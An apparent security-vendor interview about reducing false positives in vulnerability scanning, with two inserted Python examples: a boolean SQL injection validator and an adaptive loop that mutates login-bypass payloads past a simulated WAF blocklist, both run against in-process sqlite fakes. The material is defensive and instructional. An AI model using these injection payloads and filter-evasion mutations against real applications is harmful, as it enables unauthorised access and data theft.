Breaking the False Positive Curse: Inside ULTRA RED's Research Team
An exclusive interview with Eddie Zaltsman, Head of Red Team at ULTRA RED
False positives are one of the biggest challenges facing security teams today. SOC analysts are forced to sift through thousands of alerts, most of which turn out to be noise rather than genuine threats. But what if we told you there's a way to achieve less than 1% false positives while catching the vulnerabilities that really matter?
At ULTRA RED, that’s not a hypothetical - it’s the standard.
We sat down with Eddie Zaltsman, Head of Red Team, to uncover how ULTRA RED’s research team makes it possible. In part one of this two-part series, Eddie shares how his team tackles false positives head-on, leverages AI to drive precision, and turns innovative security research into real-world protection.
So Eddie, let's start with the elephant in the room – false positives. They're everywhere in cybersecurity. How did your team tackle this seemingly impossible problem?
You're absolutely right: false positives are a massive pain point across the industry. What we realized early on is that traditional vulnerability scanners rely too heavily on static checks. They're essentially making educated guesses based on responses, but they're not actually validating whether the vulnerability is real and exploitable.
Our breakthrough came when we implemented what I call our "runtime validation mechanism." Instead of just flagging potential issues, we actually test them in real time during the scan itself to confirm whether a vulnerability is truly exploitable. Think of it like the difference between a doctor saying "you might have a broken bone based on your symptoms" versus actually taking an X-ray to confirm it.
That sounds incredibly complex. Can you walk us through how this actually works in practice?
Absolutely. Traditional vulnerability scanners tend to focus on static checks, matching patterns, versions, or signatures, and assume that if something might be exploitable, it is. That’s where false positives creep in.
At ULTRA RED, we validate every signal in real time during the scan. Take an SQL injection as an example: instead of blindly injecting payloads and hoping for a reaction, we craft inputs designed to trigger deterministic behavior and confirm the vulnerability through measurable outcomes like timing, logic changes, or specific response anomalies. The same tailored approach applies to XSS, RCE, and dozens of other vectors, each with its own custom validation logic.
If a vulnerability can’t be confirmed through these targeted, controlled tests, it doesn’t make the cut. That’s why our findings are not just accurate, but actionable.
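The boolean-based check Eddie describes, written out as an added example (this is illustrative code, not ULTRA RED's engine). Three hypothetical lookup endpoints are simulated in-process with sqlite3 so the block runs offline: one concatenates the input into the query, one binds it as a parameter, and one rejects any apostrophe with a generic error. The last endpoint is the interesting one, because a "quote caused an error" heuristic would report it as injectable. The validator only confirms a finding when a tautology/contradiction probe pair produces a repeatable logic change that lands on the application's own negative path.

```python
"""Runtime validation of a boolean-based SQL injection signal.

Added example, not ULTRA RED's code. The endpoints, table contents and
probe strings below are all constructed for the demonstration.
"""
import secrets
import sqlite3
from typing import Callable

# Constructed sample data.
_DB = sqlite3.connect(":memory:")
_DB.execute("CREATE TABLE users (name TEXT)")
_DB.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])


def _render(count: int) -> str:
    return "found" if count else "not found"


def vulnerable_lookup(username: str) -> str:
    """Hypothetical endpoint that builds SQL by string concatenation."""
    sql = "SELECT count(*) FROM users WHERE name = '" + username + "'"
    try:
        return _render(_DB.execute(sql).fetchone()[0])
    except sqlite3.Error:
        return "error"


def safe_lookup(username: str) -> str:
    """Same endpoint with a bound parameter (not injectable)."""
    row = _DB.execute(
        "SELECT count(*) FROM users WHERE name = ?", (username,)
    ).fetchone()
    return _render(row[0])


def brittle_lookup(username: str) -> str:
    """Input validation that rejects quotes: noisy for a naive scanner,
    but not injectable."""
    if "'" in username:
        return "error"
    return safe_lookup(username)


def validate_boolean_sqli(
    request: Callable[[str], str], known_value: str = "alice", trials: int = 3
) -> dict:
    """Return {"confirmed": bool, "reason": str, "evidence": list}.

    Confirmation requires, on every trial:
      1. the tautology probe reproduces the baseline response, and
      2. the contradiction probe reproduces the application's own
         negative response (what a random non-existent value gets),
         not merely "something different" such as a generic error.
    """
    baseline = request(known_value)
    # Control request: a value that cannot exist, to learn the negative path.
    negative = request("nouser_" + secrets.token_hex(4))
    if baseline == negative:
        return {"confirmed": False,
                "reason": "parameter has no observable effect",
                "evidence": []}

    true_probe = f"{known_value}' AND '1'='1"
    false_probe = f"{known_value}' AND '1'='2"
    evidence = []
    for _ in range(trials):
        r_true, r_false = request(true_probe), request(false_probe)
        evidence.append((r_true, r_false))
        if r_true != baseline:
            return {"confirmed": False,
                    "reason": "tautology did not preserve baseline",
                    "evidence": evidence}
        if r_false != negative:
            return {"confirmed": False,
                    "reason": "contradiction did not hit the negative path",
                    "evidence": evidence}
    return {"confirmed": True,
            "reason": "deterministic logic change",
            "evidence": evidence}


if __name__ == "__main__":
    for label, fn in [("vulnerable", vulnerable_lookup),
                      ("safe", safe_lookup),
                      ("brittle", brittle_lookup)]:
        print(label, validate_boolean_sqli(fn))
```

Only the concatenating endpoint is confirmed; the parameterized one fails the tautology check, and the quote-rejecting one fails it too, because its error response is not the baseline. A time-based variant follows the same discipline: compare the latency of a delay probe against the baseline latency over several trials, and treat a single slow response as noise rather than proof.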
How is your detection engine different from other dynamic scanners and DAST tools out there?
Great question. On the surface, many scanners will list similar “advanced” capabilities. The difference is in how well each one is implemented and how consistently it performs in the real world. Doing all of these things well, at scale, is far from trivial.
Our detection engine follows a number of core principles, including:
- Context-Aware Crawling: We don’t just follow links blindly. The engine is capable of simulating human-like interactions, intelligently navigating single-page applications, handling modals, and interpreting dynamic DOM changes. Coupled with its deep understanding of API and WebSocket communications, these capabilities form the foundation for intelligent input fuzzing: payloads are generated dynamically based on inferred input types, allowing us to reach deep parts of the application that other scanners miss entirely.
- Adaptive Payload Mutation: When a payload gets filtered or blocked, the engine doesn’t stop; it adapts. We dynamically mutate payloads based on the responses we see, including WAF behavior, so we can bypass defenses that would stump less sophisticated tools.
- Proof-of-Exploit Validation: Every confirmed finding includes safe, reproducible proof that it’s truly exploitable. This is critical for prioritization and remediation: you’re not just taking our word for it; you see the evidence.
The magic isn’t just that we tick these boxes. It’s that each capability is engineered for depth, accuracy, and efficiency. Many tools claim these features; few deliver them at the level required to consistently find the vulnerabilities that matter, without drowning teams in noise.
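The adaptive-mutation loop from the list above, as an added example that is not ULTRA RED's engine. A hypothetical WAF is simulated as a small regex blocklist that inspects the raw parameter value, and a hypothetical origin URL-decodes the value once and runs a concatenated query against sqlite3. The loop applies one mutation at a time and distinguishes three outcomes the engine needs to tell apart: blocked by the filter, passed the filter but not exploitable, and confirmed against the origin. Real WAFs normalize encodings and are case-insensitive, so the specific bypasses here are illustrative; the point is the classification and the stop condition.

```python
"""Adaptive payload mutation against a filtering front end.

Added example, not ULTRA RED's code. The WAF rules, origin query,
table contents and mutation strategies are all constructed.
"""
import re
import sqlite3
from typing import Callable, Optional
from urllib.parse import quote, unquote

# Constructed sample data.
_DB = sqlite3.connect(":memory:")
_DB.execute("CREATE TABLE users (name TEXT, pw TEXT)")
_DB.execute("INSERT INTO users VALUES ('alice', 'secret')")

# Hypothetical WAF: a naive blocklist inspecting the raw (undecoded) value.
_BLOCKLIST = [
    re.compile(r"'\s+or\s+", re.I),
    re.compile(r"union\s+select", re.I),
    re.compile(r"--"),
]


def waf(raw_value: str) -> bool:
    """True if the request is blocked."""
    return any(p.search(raw_value) for p in _BLOCKLIST)


def origin(raw_value: str) -> bool:
    """Hypothetical login: True when a row matches, i.e. auth bypass."""
    user = unquote(raw_value)  # one URL-decode, as a web server would do
    sql = ("SELECT count(*) FROM users WHERE name = '" + user
           + "' AND pw = 'wrong'")
    try:
        return _DB.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False


def send(raw_value: str) -> Optional[bool]:
    """None = blocked by the WAF; otherwise the origin's verdict."""
    if waf(raw_value):
        return None
    return origin(raw_value)


# Mutation strategies: each keeps the SQL semantics but changes the bytes.
def mutate_case(p: str) -> str:
    """Mixed-case keywords; defeats case-sensitive rules only."""
    return re.sub(r"\b(or|and|union|select)\b",
                  lambda m: m.group(0)[0].lower() + m.group(0)[1:].upper(),
                  p, flags=re.I)


def mutate_comment_ws(p: str) -> str:
    """Replace whitespace with inline comments; SQL still parses."""
    return re.sub(r"\s+", "/**/", p)


def mutate_urlencode(p: str) -> str:
    """Percent-encode everything; the origin decodes it back."""
    return quote(p, safe="")


STRATEGIES = [
    ("keyword case", mutate_case),
    ("comment whitespace", mutate_comment_ws),
    ("url-encode", mutate_urlencode),
]


def adapt(payload: str, send_fn: Callable[[str], Optional[bool]],
          strategies=STRATEGIES) -> dict:
    """Try the payload, then each mutation, until the origin confirms it.

    Each attempt records (strategy, candidate, verdict) where verdict is
    None (blocked), False (ran but not exploitable) or True (confirmed).
    """
    attempts = []
    verdict = send_fn(payload)
    attempts.append(("original", payload, verdict))
    if verdict:
        return {"bypass": payload, "attempts": attempts}
    for name, fn in strategies:
        candidate = fn(payload)
        verdict = send_fn(candidate)
        attempts.append((name, candidate, verdict))
        if verdict:  # only True counts; None and False keep mutating
            return {"bypass": candidate, "attempts": attempts}
    return {"bypass": None, "attempts": attempts}


if __name__ == "__main__":
    result = adapt("alice' OR '1'='1", send)
    for strategy, candidate, verdict in result["attempts"]:
        print(f"{strategy:20} {candidate!r:40} -> {verdict}")
    print("bypass:", result["bypass"])
```

Against this WAF the original payload and the case-toggled variant are both blocked, the inline-comment variant passes and is confirmed by the origin, and the loop stops there. Because the stop condition is the origin's verdict rather than "the WAF let it through", a mutation that slips past the filter but breaks the SQL is recorded as `False` and does not become a finding.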
How do you keep innovating in such a fast-moving space?
It starts with the people. We hire researchers who live and breathe cybersecurity. They’re obsessing over every exploit technique, diving into threat intel, and trying to break things creatively.
Red teaming plays a huge role. There have been countless times when we've developed new detection modules or refined existing ones based on obstacles we encountered during red team exercises. It's this constant feedback loop between our research, our scanning technology, and real-world application that keeps us sharp.
Let's talk about AI integration. How are you leveraging artificial intelligence to enhance your detection capabilities?
AI is our silent workhorse. On the research side, it helps us process huge datasets: vulnerability disclosures, exploit kits, behavioral anomalies. But the real power comes during scanning. Our AI learns the baseline behavior of applications and flags subtle deviations that might signal something malicious, even if there’s no known signature.
That’s how we catch edge-case vulnerabilities and zero-days before they become mainstream.
How do you make sure all this innovation translates into value for customers?
We don’t innovate for the sake of innovation. Everything we build is shaped by real customer pain. Our team serves as Tier 3 support, so we hear the hard cases, the stuff that breaks tooling or floods inboxes. That feedback feeds directly into our roadmap.
Our customers don’t just get a list of vulnerabilities. They get validated findings, ranked by exploitability, so they can act fast and fix things.
Any advice for other teams trying to reduce false positives?
Validate everything. Detection without validation is just speculation. And while automation is key, it has to be grounded in real-world logic, not assumptions.
Also, never underestimate the human factor. The best tools are built by people who truly understand the attacker’s mindset. Passion, creativity, and curiosity are your biggest assets in this fight.
Stay tuned for Part 2 of our conversation with Eddie, where we'll dive into real-world cases and explore how ULTRA RED discovers critical vulnerabilities that others miss.
Want to learn more about how ULTRA RED can enhance your security posture? Contact our team to see our <1% false positive rate in action.